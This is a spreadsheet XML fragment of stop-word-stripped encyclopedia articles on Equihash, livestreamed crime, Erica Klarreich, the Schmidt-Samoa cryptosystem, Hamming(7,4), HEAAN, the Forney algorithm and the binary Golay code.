    <t>equihash memory-hard proof-of-work algorithm introduced university luxembourg's interdisciplinary centre security, reliability trust (snt) 2016 network distributed system security symposium. algorithm based generalization birthday problem finds colliding hash values. severe time-space trade-offs concedes vulnerability unforeseen parallel optimizations. designed parallel implementations bottle-necked memory bandwidth attempt worsen cost-performance trade-offs designing custom asic implementations. asic resistance equihash based assumption commercially-sold hardware already quite high memory bandwidth, improvements made custom hardware worth development cost. general equihash proposed alex biryukov dmitry khovratovich part university luxembourg research group cryptolux. introduced network distributed system security symposium 2016 diego. notable blockchain-based projects zcash, horizen, aion, hush, pirate chain integrated equihash reasons security, privacy, asic miner resistance. manufacturer bitmain succeeded optimizing processing zcash's equihash-200,9 asic. specification equihash three parameters {\displaystyle {\displaystyle {\displaystyle determine algorithm's time memory requirements. time complexity proportional {\displaystyle 2^{{\frac {n}{k+1}}+d}} memory complexity proportional {\displaystyle 2^{k+{\frac {n}{k+1}}}} algorithm often implemented {\displaystyle d=0} (using alternative method controlling effective difficulty). problem equihash find distinct, {\displaystyle -bit values {\displaystyle i_{1},i_{2},...,i_{2^{k}}} satisfy {\displaystyle h(i_{1})\oplus h(i_{2})\,\oplus \,...\,\oplus \,h(i_{2^{k}})=0} {\displaystyle h(i_{1}\parallel i_{2}\parallel \,...\,\parallel i_{2^{k}})} {\displaystyle leading zeros, {\displaystyle chosen hash function. addition "algorithm binding conditions" intended reduce risk algorithms developed solve underlying birthday problem applicable. memory-less verification requires {\displaystyle 2^{k}} hashes xors. memory-hardness time-space tradeoffs proposed puzzle equihash solved variation wagner's algorithm generalized birthday problem. (note underlying problem exactly generalized birthday problem defined wagner, since uses single list rather multiple lists.) proposed algorithm makes {\displaystyle iterations large list. every factor {\displaystyle {\frac {1}{q}}} fewer entries list, computational complexity algorithm scales proportional {\displaystyle q^{\frac {k}{2}}} memory-efficient implementations. alcock refute equihash’s security claims, concluding tradeoff-resistance bound fact known equihash. usage cryptocurrency zcash implements equihash {\displaystyle n=200} {\displaystyle k=9} cryptocurrency horizen implements equihash {\displaystyle n=200} {\displaystyle k=9} cryptocurrency bitcoinz implements equihash {\displaystyle n=144} {\displaystyle k=5} cryptocurrency bitcoingold implements equihash {\displaystyle n=144} {\displaystyle k=5} cryptocurrency genesis implements equihash {\displaystyle n=192} {\displaystyle k=7} also proof-of-stake proof-of-work system references</t>
  </si>
  <si>
    <t>Livestreamed crime</t>
  </si>
  <si>
    <t>livestreaming crimes phenomenon people live stream criminal acts. fact publishing social media done intent others viewing published materials, often impossible protect privacy victims people involved. history april 2016, marina lonina, raymond gates, arrested ohio, charges gates raped underage friend lonina's lonina live streamed crime periscope. prosecutor pointed lonina, taken advantage much older man, become "caught excitement number "likes" getting, shown screen "laughing giggling". joss wright oxford internet institute pointed that, given "volume content created uploaded every day, [there] almost practical prevent content like uploaded shared".by may, york times including ohio periscope rape series recent cases crimes live streamed. these included young woman égly, france, speaks periscope distress suicidal thoughts apparently encouraged viewers kill herself, throwing train. also included case teenagers live stream bragging laughing beat drunken bordeaux, france. types cybersex trafficking cybersex trafficking, also referred live streaming sexual abuse, involves trafficking live streaming coerced sexual acts rape webcam. victims abducted, threatened, deceived transferred "cybersex dens". dens location cybersex traffickers computer, tablet, phone internet connection. perpetrators social media networks, videoconferences, pornographic video sharing websites, dating pages, online chat rooms, apps, dark sites, platforms. they online payment systems cryptocurrencies hide identities. millions reports occurrence sent authorities annually. laws police procedures needed combat type cybercrime. instances 2008 june: bystander livestreamed akihabara massacre ustream, attracting audience 2000 viewers. another user also used ustream livestream massacre's aftermath, including police public response. 2016 august: korryn gaines randallstown, maryland livestreamed actions facebook instagram resisted arrest started armed standoff police, ended gaines fatally shot 5-year sustaining injuries face stray bullets. 2017 january: torture incident chicago, mental disability chicago, illinois, filmed physically verbally abused four african american individuals (two women). torture live streamed women facebook sparked massive controversy. early january: american woman taped toddler wall live streamed facebook live. january: uppsala, sweden, afghan immigrants swedish citizen live streamed gang rape woman facebook. april: thai killed infant daughter committing suicide. 2019 march: mass shootings occurred noor mosque linwood islamic centre christchurch, zealand, people killed injured australian terrorist. first attack live streamed shooter facebook live minutes, described zealand prime minister jacinda ardern darkest days zealand history". following shootings, facebook announced restrictions facebook live posted violent extremist material. march: stabbing incident saint joseph's oratory montreal, quebec, canada, captured live stream salt light television. october: shooting near synagogue kebab restaurant halle, saxony-anhalt, germany resulted dead others injured attacker; attack livestreamed twitch. december: gunman opened fire west freeway church christ white settlement, texas, fatally shooting people shot killed armed member congregation. shooting live streamed youtube church live streamed services. 2020 february: thai army sergeant killed wounded people mass shooting thailand. portion shooting terminal korat mall live-streamed perpetrator facebook live. may: shooting westgate entertainment district glendale, arizona, three people wounded, live streamed perpetrator snapchat. 2021 january: far-right personality anthime gionet, better known "baked alaska", took part storming u.s. capitol livestreamed event dlive. march: shot killed people mass shooting boulder, colorado, portion shooting king soopers supermarket live-streamed youtube bystander. august: 15-year-old student livestreamed twitch stabbing faculty member secondary school eslöv, sweden. attacker used head-mounted camera helmet livestream attack wore body armour similar brenton tarrant, quoted manifesto. 2022 january: armed gunman took multiple people hostage congregation beth israel, jewish synagogue colleyville, texas, united states. portion hostage-taking livestreamed synagogue's facebook account. may: people killed gunman, livestreaming shooting twitch, inside parking tops friendly markets buffalo, york, also beheading video christchurch call action summit shooting robert godwin, 2017 case video crime posted online (but live streamed) perpetrator snuff film references external links rising numbers criminals using facebook live film acts</t>
  </si>
  <si>
    <t>Erica Klarreich</t>
  </si>
  <si>
    <t>erica gail klarreich american mathematician, journalist science popularizer. early life education klarreich's father professor mathematics, mother mathematics teacher.klarreich obtained ph.d. mathematics guidance yair nathan minsky stony brook university 1997. mathematics mathematician, klarreich proved boundary curve complex homeomorphic space ending laminations. popular science writing popular science writer, klarreich's work appeared publications nature, scientific american, scientist, quanta magazine. winners 2021 joint policy board mathematics communications award popular science writing. selected publications mathematics "the boundary infinity curve complex relative teichmüller space" "semiconjugacies kleinian group actions riemann sphere" popular science "biologists join dots", nature, 413, 6855, 450–452, 2001. "foams honeycombs", american scientist, 152–161, 2000. "quantum cryptography: keep secret?", nature, 418, 6895, 270–272, 2002. "huygens's clocks revisited", american scientist, 322–323, 2002. references external links klarreich's personal page</t>
  </si>
  <si>
    <t>Schmidt-Samoa cryptosystem</t>
  </si>
  <si>
    <t>schmidt-samoa cryptosystem asymmetric cryptographic technique, whose security, like rabin depends difficulty integer factorization. unlike rabin algorithm produce ambiguity decryption cost encryption speed. generation choose large distinct primes compute {\displaystyle n=p^{2}q} compute {\displaystyle d=n^{-1}\mod {\text{lcm}}(p-1,q-1)} public private key. encryption encrypt message compute ciphertext {\displaystyle c=m^{n}\mod decryption decrypt ciphertext compute plaintext {\displaystyle m=c^{d}\mod pq,} like rabin computed chinese remainder theorem. example: {\displaystyle p=7,q=11,n=p^{2}q=539,d=n^{-1}\mod {\text{lcm}}(p-1,q-1)=29} {\displaystyle m=32,c=m^{n}\mod n=373} verify: {\displaystyle m=c^{d}\mod pq=373^{29}\mod pq=373^{29}\mod 77=32} security algorithm, like rabin, based difficulty factoring modulus distinct advantage rsa. that shown exists algorithm decrypt arbitrary messages, algorithm used factor efficiency algorithm processes decryption fast rabin rsa, however much slower encryption since sender must compute full exponentiation. since encryption uses fixed known exponent addition chain used optimize encryption process. cost producing optimal addition chain amortized life public key, need computed cached. references rabin-type trapdoor permutation equivalent factoring applications</t>
  </si>
  <si>
    <t>Hamming(7,4)</t>
  </si>
  <si>
    <t>coding theory, hamming(7,4) linear error-correcting code encodes four bits data seven bits adding three parity bits. member larger family hamming codes, term hamming code often refers specific code richard hamming introduced 1950. time, hamming worked bell telephone laboratories frustrated error-prone punched card reader, started working error-correcting codes.the hamming code adds three additional check bits every four data bits message. hamming's (7,4) algorithm correct single-bit error, detect single-bit two-bit errors. words, minimal hamming distance correct codewords received words correctly decoded distance codeword transmitted sender. this means transmission medium situations burst errors occur, hamming's (7,4) code effective medium would extremely noisy seven bits flipped). quantum information, hamming (7,4) used base steane code, type code used quantum error correction. goal goal hamming codes create parity bits overlap single-bit error data parity detected corrected. while multiple overlaps created, general method presented hamming codes. this table describes parity bits cover transmitted bits encoded word. example, provides even parity bits also details transmitted covered parity reading column. example, covered this table striking resemblance parity-check matrix next section. furthermore, parity columns table removed resemblance rows code generator matrix also evident. picking parity coverage correctly, errors hamming distance detected corrected, point using hamming code. hamming matrices hamming codes computed linear algebra terms matrices hamming codes linear codes. purposes hamming codes, hamming matrices defined: code generator matrix parity-check matrix {\displaystyle \mathbf {g^{t}} :={\begin{pmatrix}1&amp;1&amp;0&amp;1\\1&amp;0&amp;1&amp;1\\1&amp;0&amp;0&amp;0\\0&amp;1&amp;1&amp;1\\0&amp;1&amp;0&amp;0\\0&amp;0&amp;1&amp;0\\0&amp;0&amp;0&amp;1\\\end{pmatrix}},\qquad \mathbf :={\begin{pmatrix}1&amp;0&amp;1&amp;0&amp;1&amp;0&amp;1\\0&amp;1&amp;1&amp;0&amp;0&amp;1&amp;1\\0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1\\\end{pmatrix}}.} mentioned above, rows look familiar data bits parity bits: covers covers covers d4the remaining rows data position encoded form identical copy. fact, four rows linearly independent form identity matrix design, coincidence). also mentioned above, three rows familiar. these rows used compute syndrome vector receiving syndrome vector null vector (all zeros) received word error-free; non-zero value indicates flipped. four data bits assembled vector pre-multiplied (i.e., taken modulo yield encoded value transmitted. original data bits converted seven bits (hence name "hamming(7,4)") three parity bits added ensure even parity using data coverages. first table shows mapping data parity final position also presented venn diagram. first diagram article shows three circles (one parity bit) encloses data bits parity covers. second diagram (shown right) identical but, instead, positions marked. remainder section, following bits (shown column vector) used running example: {\displaystyle \mathbf ={\begin{pmatrix}d_{1}\\d_{2}\\d_{3}\\d_{4}\\\end{pmatrix}}={\begin{pmatrix}1\\0\\1\\1\end{pmatrix}}} channel coding suppose want transmit data (1011) noisy communications channel. specifically, binary symmetric channel meaning error corruption favor either zero symmetric causing errors). furthermore, source vectors assumed equiprobable. take product entries modulo determine transmitted codeword {\displaystyle \mathbf =\mathbf {g^{t}} \mathbf ={\begin{pmatrix}1&amp;1&amp;0&amp;1\\1&amp;0&amp;1&amp;1\\1&amp;0&amp;0&amp;0\\0&amp;1&amp;1&amp;1\\0&amp;1&amp;0&amp;0\\0&amp;0&amp;1&amp;0\\0&amp;0&amp;0&amp;1\\\end{pmatrix}}{\begin{pmatrix}1\\0\\1\\1\end{pmatrix}}={\begin{pmatrix}2\\3\\1\\2\\0\\1\\1\end{pmatrix}}={\begin{pmatrix}0\\1\\1\\0\\0\\1\\1\end{pmatrix}}} this means 0110011 would transmitted instead transmitting 1011. programmers concerned multiplication observe result least significant population count bits resulting column bitwise anded together rather multiplied. adjacent diagram, seven bits encoded word inserted respective locations; inspection clear parity red, green, blue circles even: circle green circle blue circle four 1'swhat shown shortly transmission, flipped parity three circles incorrect errored determined (even parity bits) knowing parity three circles even. parity check error occurs transmission, received codeword identical transmitted codeword {\displaystyle \mathbf =\mathbf receiver multiplies obtain syndrome vector indicates whether error occurred, codeword bit. performing multiplication (again, entries modulo {\displaystyle \mathbf =\mathbf \mathbf ={\begin{pmatrix}1&amp;0&amp;1&amp;0&amp;1&amp;0&amp;1\\0&amp;1&amp;1&amp;0&amp;0&amp;1&amp;1\\0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1\\\end{pmatrix}}{\begin{pmatrix}0\\1\\1\\0\\0\\1\\1\end{pmatrix}}={\begin{pmatrix}2\\4\\2\end{pmatrix}}={\begin{pmatrix}0\\0\\0\end{pmatrix}}} since syndrome null vector, receiver conclude error occurred. this conclusion based observation data vector multiplied change basis occurs vector subspace kernel long nothing happens transmission, remain kernel multiplication yield null vector. error correction otherwise, suppo mathematically, write {\displaystyle \mathbf =\mathbf +\mathbf _{i}} modulo {\displaystyle i_{th}} unit vector, zero vector {\displaystyle i^{th}} counting {\displaystyle \mathbf _{2}={\begin{pmatrix}0\\1\\0\\0\\0\\0\\0\end{pmatrix}}} thus expression signifies single error {\displaystyle i^{th}} place. now, multiply vector {\displaystyle \mathbf {hr} =\mathbf \left(\mathbf +\mathbf _{i}\right)=\mathbf {hx} +\mathbf {he} _{i}} since transmitted data, without error, result, product zero. thus {\displaystyle \mathbf {hx} +\mathbf {he} _{i}=\mathbf +\mathbf {he} _{i}=\mathbf {he} _{i}} now, product {\displaystyle i^{th}} standard basis vector picks column know error occurs place column occurs. example, suppose introduced error {\displaystyle \mathbf =\mathbf +\mathbf _{5}={\begin{pmatrix}0\\1\\1\\0\\0\\1\\1\end{pmatrix}}+{\begin{pmatrix}0\\0\\0\\0\\1\\0\\0\end{pmatrix}}={\begin{pmatrix}0\\1\\1\\0\\1\\1\\1\end{pmatrix}}} diagram right shows error (shown blue text) parity created (shown text) green circles. error detected computing parity red, green, blue circles. parity detected data overlaps parity circles error. example, green circles parity corresponding intersection green blue indicates errored bit. now, {\displaystyle \mathbf =\mathbf {hr} ={\begin{pmatrix}1&amp;0&amp;1&amp;0&amp;1&amp;0&amp;1\\0&amp;1&amp;1&amp;0&amp;0&amp;1&amp;1\\0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1\\\end{pmatrix}}{\begin{pmatrix}0\\1\\1\\0\\1\\1\\1\end{pmatrix}}={\begin{pmatrix}3\\4\\3\end{pmatrix}}={\begin{pmatrix}1\\0\\1\end{pmatrix}}} corresponds fifth column furthermore, general algorithm used (see hamming code#general algorithm) intentional construction syndrome corresponds binary value indicates fifth corrupted. thus, error detected corrected (simply flip negate value): corrected {\displaystyle \mathbf _{\text{corrected}}={\begin{pmatrix}0\\1\\1\\0\\{\overline {1}}\\1\\1\end{pmatrix}}={\begin{pmatrix}0\\1\\1\\0\\0\\1\\1\end{pmatrix}}} this corrected received value indeed, now, matches transmitted value above. decoding once received vector determined error-free corrected error occurred (assuming zero errors possible) received data needs decoded back original four bits. first, define matrix {\displaystyle \mathbf ={\begin{pmatrix}0&amp;0&amp;1&amp;0&amp;0&amp;0&amp;0\\0&amp;0&amp;0&amp;0&amp;1&amp;0&amp;0\\0&amp;0&amp;0&amp;0&amp;0&amp;1&amp;0\\0&amp;0&amp;0&amp;0&amp;0&amp;0&amp;1\\\end{pmatrix}}} then received value, equal using running example {\displaystyle \mathbf {p_{r}} ={\begin{pmatrix}0&amp;0&amp;1&amp;0&amp;0&amp;0&amp;0\\0&amp;0&amp;0&amp;0&amp;1&amp;0&amp;0\\0&amp;0&amp;0&amp;0&amp;0&amp;1&amp;0\\0&amp;0&amp;0&amp;0&amp;0&amp;0&amp;1\\\end{pmatrix}}{\begin{pmatrix}0\\1\\1\\0\\0\\1\\1\end{pmatrix}}={\begin{pmatrix}1\\0\\1\\1\end{pmatrix}}} multiple errors difficult show single errors corrected using scheme. alternatively, hamming codes used detect single double errors, merely noting product nonzero whenever errors occurred. adjacent diagram, bits flipped. this yields circle (green) invalid parity errors recoverable. however, hamming (7,4) similar hamming codes cannot distinguish single-bit errors two-bit errors. that two-bit errors appear one-bit errors. error correction performed two-bit error result incorrect. similarly, hamming codes cannot detect recover arbitrary three-bit error; consider diagram: green circle (colored red) parity checking would return null vector, indicating error codeword. codewords since source bits possible transmitted words. included eight-bit value extra parity used (see hamming(7,4) code additional parity bit). (the data bits shown blue; parity bits shown red; extra parity shown green.) lattice hamming(7,4) code closely related lattice and, fact, used construct precisely, dual lattice similar construction uses dual code [7,3,4]2). particular, taking vectors congruent (modulo codeword hamming(7,4), rescaling 1/√2, gives lattice {\displaystyle e_{7}^{*}={\tfrac {1}{\sqrt {2}}}\left\{x\in \mathbb ^{7}:x{\bmod {2}}\in [7,4,3]_{2}\right\}.} this particular instance general relation lattices codes. instance, extended (8,4)-hamming code, arises addition parity bit, also related lattice. references external links programming problem hamming code(7,4)</t>
  </si>
  <si>
    <t>HEAAN</t>
  </si>
  <si>
    <t>heaan (homomorphic encryption arithmetic approximate numbers) open source homomorphic encryption (he) library implements approximate scheme proposed cheon, kim, song (ckks). first version heaan published github 2016, later version heaan bootstrapping algorithm released. currently, latest version version 2.1. ckks plaintext space unlike schemes, ckks scheme supports approximate arithmetics complex numbers (hence, real numbers). more precisely, plaintext space ckks scheme {\displaystyle \mathbb ^{n/2}} power-of-two integer {\displaystyle deal complex plaintext vector efficiently, cheon proposed plaintext encoding/decoding methods exploits ring isomorphism {\displaystyle \phi :\mathbb [x]/(x^{n}+1)\rightarrow \mathbb ^{n/2}} encoding method given plaintext vector {\displaystyle {\vec {z}}=(z_{1},z_{2},...,z_{n/2})\in \mathbb ^{n/2}} scaling factor {\displaystyle \delta plaintext vector encoded polynomial {\displaystyle m(x)\in r:=\mathbb [x]/(x^{n}+1)} computing {\displaystyle m(x)=\lfloor \delta \cdot \phi ^{-1}({\vec {z}})\rceil {\displaystyle \lfloor \cdot \rceil denotes coefficient-wise rounding function. decoding method given message polynomial {\displaystyle m(x)\in scaling factor {\displaystyle \delta message polynomial decoded complex vector {\displaystyle {\vec {z}}\in \mathbb ^{n/2}} computing {\displaystyle {\vec {z}}=\delta ^{-1}\cdot \phi (m(x))\in \mathbb ^{n/2}} here scaling factor {\displaystyle \delta enables control encoding/decoding error occurred rounding process. namely, obtain approximate equation {\displaystyle {\text{dcd}}({\text{ecd}}({\vec {z}};\delta );\delta )\approx {\vec {z}}} controlling {\displaystyle \delta {\displaystyle {\text{ecd}}} {\displaystyle {\text{dcd}}} denote encoding decoding algorithm, respectively. from ring-isomorphic property mapping {\displaystyle \phi :\mathbb [x]/(x^{n}+1)\rightarrow \mathbb ^{n/2}} {\displaystyle m_{1}={\text{ecd}}({\vec {z}}_{1};\delta {\displaystyle m_{2}={\text{ecd}}({\vec {z}}_{2};\delta following hold: {\displaystyle {\text{dcd}}(m_{1}+m_{2};\delta )\approx {\vec {z}}_{1}+{\vec {z}}_{2}} {\displaystyle {\text{dcd}}(m_{1}\cdot m_{2};\delta )\approx {\vec {z}}_{1}\circ {\vec {z}}_{2}} ,where {\displaystyle \circ denotes hadamard product same-length vectors. these properties guarantee approximate correctness computations encoded state scaling factor {\displaystyle \delta chosen appropriately. algorithms ckks scheme basically consists algorithms: generation, encryption, decryption, homomorphic addition multiplication, rescaling. positive integer {\displaystyle {\displaystyle r_{q}:=r/qr} quotient ring {\displaystyle modulo {\displaystyle {\displaystyle \chi _{s}} {\displaystyle \chi _{r}} {\displaystyle \chi _{e}} distributions {\displaystyle output polynomials small coefficients. these distributions, initial modulus {\displaystyle ring dimension {\displaystyle predetermined generation phase. generation generation algorithm following: sample secret polynomial {\displaystyle s\leftarrow \chi _{s}} sample {\displaystyle (resp. {\displaystyle uniform randomly {\displaystyle r_{q}} (resp. {\displaystyle r_{pq}} {\displaystyle e,e'\leftarrow \chi _{e}} output secret {\displaystyle sk\leftarrow (1,s)\in r_{q}^{2}} public {\displaystyle pk\leftarrow (b=-a\cdot s+e,a)\in r_{q}^{2}} evaluation {\displaystyle evk\leftarrow (b'=-a'\cdot s+e'+p\cdot s^{2},a')\in r_{pq}^{2}} encryption encryption algorithm following: sample ephemeral secret polynomial {\displaystyle r\leftarrow \chi _{r}} given message polynomial {\displaystyle m\in output ciphertext {\displaystyle ct\leftarrow (c_{0}=r\cdot b+e_{0}+m,c_{1}=r\cdot a+e_{1})\in r_{q}^{2}} decryption decryption algorithm following: given ciphertext {\displaystyle ct\in r_{q}^{2}} output message {\displaystyle m'\leftarrow \langle ct,sk\rangle {\displaystyle ({\text{mod }}q)} .the decryption outputs approximate value original message, i.e., {\displaystyle {\text{dec}}(sk,{\text{enc}}(pk,m))\approx approximation error determined choice distributions {\displaystyle \chi _{s},\chi _{e},\chi _{r}} when considering homomorphic operations, evaluation errors also included approximation error. basic homomorphic operations, addition multiplication, done follows. homomorphic addition homomorphic addition algorithm following: given ciphertexts {\displaystyle {\displaystyle ct'} {\displaystyle r_{q}^{2}} output {\displaystyle ct_{\text{add}}\leftarrow ct+ct'\in r_{q}^{2}} .the correctness holds {\displaystyle {\text{dec}}(sk,ct_{\text{add}})\approx {\text{dec}}(sk,ct)+{\text{dec}}(sk,ct')} homomorphic multiplication homomorphic multiplication algorithm following: given ciphertext {\displaystyle ct=(c_{0},c_{1})} {\displaystyle ct'=(c_{0}',c_{1}')} {\displaystyle r_{q}^{2}} compute {\displaystyle (d_{0},d_{1},d_{2})=(c_{0}c_{0}',c_{0}c_{1}'+c_{1}c_{0}',c_{1}c_{1}')} {\displaystyle ({\text{mod }}q)} output mult {\displaystyle ct_{\text{mult}}\leftarrow (d_{0},d_{1})+\lfloor p^{-1}\cdot d_{2}\cdot evk\rceil r_{q}^{2}} .the correctness holds mult {\displaystyle {\text{dec}}(sk,ct_{\text{mult}})\approx {\text{dec}}(sk,ct)\cdot {\text{dec}}(sk,ct')} note approximation error message) exponentially grows number homomorphic multiplications. overcome problem, schemes usually modulus-switching technique introduced brakerski, gentry vaikuntanathan. case heaan, modulus-switching procedure called rescaling. rescaling algorithm simple compared brakerski-gentry-vaikuntanathan's original algorithm. applying rescaling algorithm homomomorphic multiplication, approximation error grows linearly, exponentially. rescaling rescaling algorithm following: given ciphertext {\displaystyle ct\in r_{q}^{2}} modulus {\displaystyle q'&lt;q} output rescaled ciphertext {\displaystyle ct_{\text{rs}}\leftarrow \lfloor (q'/q)\cdot ct\rceil r_{q'}^{2}} .the total procedure ckks scheme following: each plaintext vector {\displaystyle {\vec {z}}} consists complex real) numbers firstly encoded polynomial {\displaystyle m(x)\in encoding method, encrypted ciphertext {\displaystyle ct\in r_{q}^{2}} after several homomorphic operations, resulting ciphertext decrypted polynomial {\displaystyle m'(x)\in decoded plaintext vector {\displaystyle {\vec {z}}'} final output. security ind-cpa security ckks scheme based hardness assumption ring learning errors (rlwe) problem, ring variant promising lattice-based hard problem learning errors (lwe). currently best known attacks rlwe power-of-two cyclotomic ring general attacks dual attack primal attack. security ckks scheme based known attacks estimated albrecht's estimator. library version 1.0, released far. version first implementation ckks scheme without bootstrapping. second version, bootstrapping algorithm attached users able address large-scale homomorphic computations. version 2.1, currently latest version, multiplication ring elements {\displaystyle r_{q}} accelerated utilizing fast fourier transform (fft)-optimized number theoretic transform (ntt) implementation. references</t>
  </si>
  <si>
    <t>Forney algorithm</t>
  </si>
  <si>
    <t>coding theory, forney algorithm forney's algorithm) calculates error values known error locations. used steps decoding codes reed–solomon codes subclass codes). george david forney developed algorithm. procedure need introduce terminology setup...code words look like polynomials. design, generator polynomial consecutive roots αc+1, ..., αc+d−2. syndromes error location polynomial {\displaystyle \lambda (x)=\prod _{i=1}^{\nu }(1-x\,x_{i})=1+\sum _{i=1}^{\nu }\lambda _{i}\,x^{i}} zeros λ(x) x1−1, ..., xν−1. zeros reciprocals error locations {\displaystyle x_{j}=\alpha ^{i_{j}}} once error locations known, next step determine error values locations. error values used correct received values locations recover original codeword. general case, error weights determined solving linear system {\displaystyle s_{0}=e_{1}\alpha ^{(c+0)\,i_{1}}+e_{2}\alpha ^{(c+0)\,i_{2}}+\cdots {\displaystyle s_{1}=e_{1}\alpha ^{(c+1)\,i_{1}}+e_{2}\alpha ^{(c+1)\,i_{2}}+\cdots {\displaystyle \cdots however, efficient method known forney algorithm, based lagrange interpolation. first calculate error evaluator polynomial {\displaystyle \omega (x)=s(x)\,\lambda (x){\pmod {x^{2t}}}\,} where s(x) partial syndrome polynomial: {\displaystyle s(x)=s_{0}x^{0}+s_{1}x^{1}+s_{2}x^{2}+\cdots +s_{2t-1}x^{2t-1}.} then evaluate error values: {\displaystyle e_{j}=-{\frac {x_{j}^{1-c}\,\omega (x_{j}^{-1})}{\lambda '(x_{j}^{-1})}}\,} value often called "first consecutive root" "fcr". some codes select expression simplifies {\displaystyle e_{j}=-{\frac {\omega (x_{j}^{-1})}{\lambda '(x_{j}^{-1})}}} formal derivative λ'(x) formal derivative error locator polynomial λ(x): {\displaystyle \lambda '(x)=\sum _{i=1}^{\nu }i\,\cdot \,\lambda _{i}\,x^{i-1}} expression, note integer, would element finite field. operator represents ordinary multiplication (repeated addition finite field) finite field's multiplication operator. derivation lagrange interpolation gill (n.d., 52–54) gives derivation forney algorithm. erasures define erasure locator polynomial {\displaystyle \gamma (x)=\prod (1-x\,\alpha ^{j_{i}})} where erasure locations given apply procedure described above, substituting errors erasures present, error-and-erasure locator polynomial {\displaystyle \psi (x)=\lambda (x)\,\gamma (x)} also code reed–solomon error correction references forney, (october 1965), decoding codes", ieee transactions information theory, (4): 549–557, doi:10.1109/tit.1965.1053825, issn 0018-9448 gill, john (n.d.), ee387 notes handout (pdf), stanford university, 42–45, archived original (pdf) june 2014, retrieved april 2010 wesley peterson's book</t>
  </si>
  <si>
    <t>Binary Golay code</t>
  </si>
  <si>
    <t>mathematics electronics engineering, binary golay code type linear error-correcting code used digital communications. binary golay code, along ternary golay code, particularly deep interesting connection theory finite sporadic groups mathematics. these codes named honor marcel golay whose 1949 paper introducing called, berlekamp, "best single published page" coding theory.there closely related binary golay codes. extended binary golay code, (sometimes called "golay code" finite group theory) encodes bits data 24-bit word 3-bit errors corrected 7-bit errors detected. other, perfect binary golay code, g23, codewords length obtained extended binary golay code deleting coordinate position (conversely, extended binary golay code obtained perfect binary golay code adding parity bit). standard coding notation codes parameters [24, [23, corresponding length codewords, dimension code, minimum hamming distance codewords, respectively. mathematical definition mathematical terms, extended binary golay code consists 12-dimensional linear subspace space f242 24-bit words distinct elements differ least coordinates. called linear code vector space. all, comprises 4096 elements. elements called code words. they also described subsets elements, addition defined taking symmetric difference subsets. extended binary golay code, code words hamming weights code words weight called octads code words weight called dodecads. octads code elements s(5,8,24) steiner system. there octads complements thereof. follows 2576 dodecads. octads intersect (have common) coordinates binary vector representation (these possible intersection sizes subset representation). octad dodecad intersect coordinates. relabeling coordinates, unique.the binary golay code, perfect code. that spheres radius three around code words form partition vector space. 12-dimensional subspace space f232. automorphism group perfect binary golay code (meaning subgroup group permutations coordinates f232 leave invariant), mathieu group {\displaystyle m_{23}} automorphism group extended binary golay code mathieu group {\displaystyle m_{24}} order {\displaystyle m_{24}} transitive octads dodecads. mathieu groups occur stabilizers several elements constructions lexicographic code: order vectors lexicographically (i.e., interpret unsigned 24-bit binary integers take usual ordering). starting define ..., rule smallest integer differs linear combinations previous elements least eight coordinates. then defined span ..., w12. mathieu group: witt 1938 published construction largest mathieu group used construct extended binary golay code. quadratic residue code: consider quadratic non-residues (mod 23). this 11-element subset cyclic group z/23z. consider translates subset. augment translate 12-element adding element then labeling basis elements ..., defined span words together word consisting basis vectors. (the perfect code obtained leaving cyclic code: perfect code constructed factorization {\displaystyle x^{23}-1} binary field gf(2): {\displaystyle x^{23}-1=(x-1)(x^{11}+x^{9}+x^{7}+x^{6}+x^{5}+x+1)(x^{11}+x^{10}+x^{6}+x^{5}+x^{4}+x^{2}+1).} code generated {\displaystyle \left(x^{11}+x^{10}+x^{6}+x^{5}+x^{4}+x^{2}+1\right)} either degree irreducible factors used generate code.turyn's construction 1967, simple construction binary golay code," starts hamming code length quadratic residues from steiner system s(5,8,24), consisting subsets 24-set. interprets support subset 0-1-codeword length (with hamming-weight "octads" binary golay code. entire golay code obtained repeatedly taking symmetric differences subsets, i.e. binary addition. easier write steiner system resp. octads miracle octad generator curtis, uses particular 1:1-correspondence partitions 8-set 4-sets partitions finite vector space {\displaystyle \mathbb _{2}^{4}} planes. nowadays often compact approach conway's hexacode, uses array square cells, used. winning positions mathematical game mogul: position mogul coins. each turn consists flipping seven coins leftmost flipped coins goes head tail. losing positions legal move. heads interpreted tails moving codeword extended binary golay code guarantees possible force win. generator matrix binary golay code 12×12 identity matrix, complement adjacency matrix icosahedron. convenient representation convenient "miracle octad generator" format, co-ordinates array rows, columns. addition taking symmetric difference. columns parity, equals row. partition columns pairs adjacent ones constitutes trio. this partition octad sets. subgroup, projective special linear group psl(2,7) trio subgroup useful generating basis. psl(2,7) permutes octads internally, parallel. permutes octads bodily. basis begins octad 0and similar octads. code words consists 1's. adding code word produces complement. griess uses labeling: 4psl(2,7) naturally linear fractional group generated (0123456) (0∞)(16)(23)(45). 7-cycle acts give subspace including also basis elements 0and 0the resulting 7-dimensional subspace 3-dimensional quotient space upon ignoring latter octads. there code words similar structure complete basis code words representation subspace dimension symmetric psl(2,7) spanned dodecads formed subsets {0,3,5,6}, {0,1,4,6}, {0,1,2,5}. practical applications golay codes nasa deep space missions error correction vital data transmission voyager spacecraft particularly memory constraints dictated offloading data virtually instantly leaving second chances. hundreds color pictures jupiter saturn 1979, 1980, 1981 fly-bys would transmitted within constrained telecommunications bandwidth. color image transmission required three times amount data black white images, 7-error correcting reed–muller code used transmit black white mariner images replaced much higher data rate golay (24,12,8) code. radio communications mil-std-188 american military standards automatic link establishment high frequency radio systems specify extended (24,12) golay code forward error correction. also leech lattice linear code references sources conway, john horton; sloane, neil (1999), sphere packings, lattices groups, grundlehren mathematischen wissenschaften, vol. (3rd ed.), berlin, york: springer-verlag, isbn 978-0-387-98585-5, 0920369 curtis, (1976). combinatorial approach m24". mathematical proceedings cambridge philosophical society. 25–42. doi:10.1017/s0305004100052075. greferath, marcus (2003). "golay codes". proakis, john (ed.). encyclopedia telecommunications. wiley. doi:10.1002/0471219282.eot371. isbn 0471219282. griess, robert (1998). twelve sporadic groups. springer. 167. isbn 978-3-540-62778-4. pless, vera (1998), introduction theory error-correcting codes (3rd ed.), john wiley sons, isbn 978-0-471-19047-9 roman, steven (1996), coding information theory, graduate texts mathematics #134, springer-verlag, isbn 0-387-97812-7 thompson, thomas (1983). from error correcting codes sphere packings simple groups. carus mathematical monographs. vol. mathematical association america. isbn 978-0-88385-023-7. turyn, richard (1967). research develop algebraic theory codes (section (pdf) (report). force cambridge research laboratories. archived original (pdf) october 2018.</t>
  </si>
